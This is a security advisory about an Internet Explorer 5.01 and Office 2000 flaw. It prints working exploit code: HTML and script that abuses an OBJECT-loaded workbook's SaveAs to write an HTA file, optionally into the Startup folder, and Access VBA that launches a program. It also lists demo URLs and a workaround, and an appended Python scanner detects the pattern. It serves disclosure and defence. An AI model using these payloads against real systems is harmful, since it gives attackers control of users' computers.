A combination of Internet Explorer 5.01 with Excel, PowerPoint or Access 2000 enables attackers to execute local commands by designing a special web page or sending a custom HTML email message (using an IFRAME in the latter case).
This means that users who browse the web with IE and have Office 2000 installed expose themselves to an attack that results in full control over the user's computer.
Credit:
The information has been provided by Georgi Guninski.
Vulnerable systems:
IE 5.01 where Excel 2000, PowerPoint 2000 or Access 2000 is installed.
IE 5.01 can launch dangerous ActiveX objects with the help of the <OBJECT> tag and Office 2000 applications. For example, the following code loads an XLA file:
<object data="Book1.xla" id="sh1" width=0 height=0></object>
where Book1.xla is just an XLS file renamed to XLA. The same result may be achieved with a .ppt or .xls file, and probably other Office 2000 file types.
The result is an object in IE that offers a SaveAs() method. The SaveAs method can save the Excel Workbook or PowerPoint object to an arbitrary location, including the Startup folder. The content of the saved file is controllable and depends on the content of Book1.xla. If the saved file is an HTA file, for example, it is possible to execute arbitrary programs on the user's computer.
Exploit:
---------------------------------------------------
<object data="Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
/*sh1.object.SaveAs("C:\\windows\\Start Menu\\Programs\\StartUp\\georgi-xla.hta",6);*/
alert(fn+" successfully written");
}
setTimeout("f()",5000);
</SCRIPT>
---------------------------------------------------
Demonstration:
A live demonstration is available at:
http://www.nat.bg/~joro/sheetex.html
Exploit Code for Access 2000:
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)
Exit_Command0_Click:
Exit Sub
Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub
---------------------------------------------------
Form1 is automatically opened at database startup.
Demonstration:
A demonstration of the Access vulnerability is available at:
http://www.nat.bg/~joro/access.html
Workaround:
Disable Active Scripting, or disable "Run ActiveX controls and plug-ins".
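As an added, defender-side example (not part of Guninski's advisory): a small Python scanner that a mail gateway or proxy could run over HTML to flag the OBJECT-tag pattern described above. The sample documents are constructed to mirror the advisory's two exploit pages; the extension list and the ".object.SaveAs(" check are assumptions drawn from the text.

```python
from html.parser import HTMLParser

# Office 2000 document types the advisory shows being loaded through <OBJECT data=...>
OFFICE_EXTENSIONS = (".xla", ".xls", ".ppt", ".mdb")


class OfficeObjectScanner(HTMLParser):
    """Records OBJECT tags that load Office files and scripts that call .object.SaveAs()."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # buffer for the text of the <script> currently open

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "object":
            data = (attrs.get("data") or "").strip().lower()
            if data.endswith(OFFICE_EXTENSIONS):
                self.findings.append(f"OBJECT loads Office document: {data}")
        elif tag == "iframe":
            # HTML mail reaches the hostile page through an IFRAME; record it for context.
            self.findings.append(f"IFRAME src={attrs.get('src')}")
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            if ".object.saveas(" in "".join(self._script).lower():
                self.findings.append("script calls object.SaveAs()")
            self._script = None


def scan_html(html):
    """Return the list of indicators found in one HTML document."""
    scanner = OfficeObjectScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_suspicious(html):
    """An Office file loaded via OBJECT is enough: the .mdb case needs no script at all."""
    return any(f.startswith("OBJECT") for f in scan_html(html))


# Constructed samples modelled on the advisory's two exploit pages (not live code).
SAMPLE_XLA = ('<object data="Book1.xla" id="sh1" width=0 height=0></object>\n'
              '<SCRIPT>function f(){ sh1.object.SaveAs("C:\\\\x.hta",6); }'
              ' setTimeout("f()",5000);</SCRIPT>')
SAMPLE_MDB = '<OBJECT data="db3.mdb" id="d1"></OBJECT>'
BENIGN = '<object data="movie.swf" type="application/x-shockwave-flash"></object>'
```

Running scan_html over the two samples reports the Office OBJECT load (and, for the XLA page, the scripted SaveAs call), while the Flash object yields no findings.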